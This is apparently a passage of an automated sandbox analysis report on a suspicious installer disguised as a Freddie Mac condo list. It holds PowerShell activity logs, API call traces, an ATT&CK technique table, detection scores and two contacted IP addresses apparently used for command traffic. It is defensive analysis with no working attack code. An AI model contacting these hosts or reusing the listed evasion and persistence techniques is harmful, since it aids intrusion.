Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	1_2_0040B044
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: GetLocaleInfoW,	1_2_0041E034
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: GetLocaleInfoW,	1_2_0041E080
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: GetLocaleInfoW,	1_2_004AF218
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_0040A4CC
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	5_2_0040E7F0
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: GetLocaleInfoW,	5_2_006103F8
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_0040DC78

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Code function: 1_2_00405AE0 cpuid

1_2_00405AE0

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Code function: 5_2_00625754 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,

5_2_00625754

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Code function: 1_2_0041C3D8 GetLocalTime,

1_2_0041C3D8

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Code function: 1_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

1_2_004B5114

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Startup Items1	Startup Items1	Deobfuscate/Decode Files or Information1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter12	Registry Run Keys / Startup Folder12	Exploitation for Privilege Escalation1	Obfuscated Files or Information2	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell3	Logon Script (Windows)	Access Token Manipulation1	Masquerading1	Security Account Manager	System Information Discovery35	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection12	Virtualization/Sandbox Evasion21	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder12	Access Token Manipulation1	LSA Secrets	Security Software Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection12	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Virtualization/Sandbox Evasion21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Freddie-Mac-Warrantable-Condo-List.exe	15%	Virustotal		Browse
Freddie-Mac-Warrantable-Condo-List.exe	9%	Metadefender		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_isdecmp.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_setup64.tmp	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	2%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://167.88.15.115/	2%	Virustotal		Browse
http://167.88.15.115/	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://5.254.118.226/	0%	Avira URL Cloud	safe
https://www.remobjects.com/ps	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
https://www.innosetup.com/	0%	URL Reputation	safe
http://www.microsoft.coT	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://jrsoftware.org0	0%	Avira URL Cloud	safe
http://cscasha2.ocsp-certum.com04	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://167.88.15.115/	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://5.254.118.226/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false		high
http://repository.certum.pl/cscasha2.cer0	Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	false		high
